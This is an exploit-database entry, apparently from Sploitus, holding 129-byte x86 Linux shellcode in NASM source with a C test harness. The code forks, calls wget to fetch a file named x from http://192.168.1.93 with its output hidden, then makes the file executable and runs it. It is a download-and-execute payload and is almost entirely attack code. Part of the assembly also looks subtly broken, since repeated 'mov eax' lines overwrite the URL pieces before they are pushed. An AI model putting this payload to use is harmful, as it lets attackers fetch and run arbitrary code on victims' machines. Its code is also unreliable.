Share
## https://sploitus.com/exploit?id=1337DAY-ID-32919
/**

; Shellcode 129 Bytes
; download (via wget) + chmod + execute shellcode + hide output
;      Exec: /usr/bin/wget http://192.168.1.93//x > /dev/null 2>&1
;

global _start

section .text

_start:

    ;fork
    xor eax,eax
    mov al,0x2
    int 0x80
    xor ebx,ebx
    cmp eax,ebx
    jz download
  
    ; wait(NULL)
    xor eax,eax
    mov al,0x7
    int 0x80
        
    ; give execution permissions to the binary x
    xor ecx,ecx
    xor eax, eax
    push eax
    mov al, 0xf
    push 0x78
    mov ebx, esp
    xor ecx, ecx
    mov cx, 0x1ff
    int 0x80
    
    ; execution of binary x
    xor eax, eax
    push eax
    push 0x78
    mov ebx, esp
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp
    mov al, 11
    int 0x80
    
download:

    push 0xb
    pop eax
    cdq
    push edx
    ; download uri
    mov eax, 0x31263e32 ; 1&>2 hide_output[4] 
    mov eax, 0x6c6c756e ; llun/  hide_output[3]
    mov eax, 0x2f766564 ; ved  hide_output[2]
    mov eax, 0x2f3e20 ; />  hide_output[1]
    mov eax, 0x782f2f ; x//  path[1]
    mov eax, 0x33392e31 ;93.1 addr[3]
    mov eax, 0x2e383631 ;.861 addr[2]
    mov eax, 0x2e323931 ;.291  addr[1]
    push eax
    mov ecx,esp
    push edx
    
    ; download execution in /usr/bin/wget
    
    push 0x74 ;t
    push 0x6567772f ;egw/
    push 0x6e69622f ;nib/
    push 0x7273752f ;rsu/
    mov ebx,esp
    push edx
    push ecx
    push ebx
    mov ecx,esp
    int 0x80
    

**/

// nasm -felf32 wget.nasm -o wget.o
// ld -m elf_i386 wget.o -o wget

#include <stdio.h>
#include <string.h>

// gcc -z execstack -fno-stack-protector shellcode.c -o shellcode

// SHELLCODE 129 Bytes

char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8"
"\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9"
"\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31"
"\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50"
"\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1"
"\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\xb8"
"\x32\x3e\x26\x31\xb8\x6e\x75\x6c\x6c\xb8"
"\x64\x65\x76\x2f\xb8\x20\x3e\x2f\x00\xb8"
"\x2f\x2f\x78\x00\xb8\x31\x2e\x39\x33\xb8"
"\x31\x36\x38\x2e\xb8\x31\x39\x32\x2e\x50"
"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65"
"\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72"
"\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";


void main(int argc, char **argv)
{
        int (*func)();
        func = (int (*)()) buf;
        (int)(*func)();
}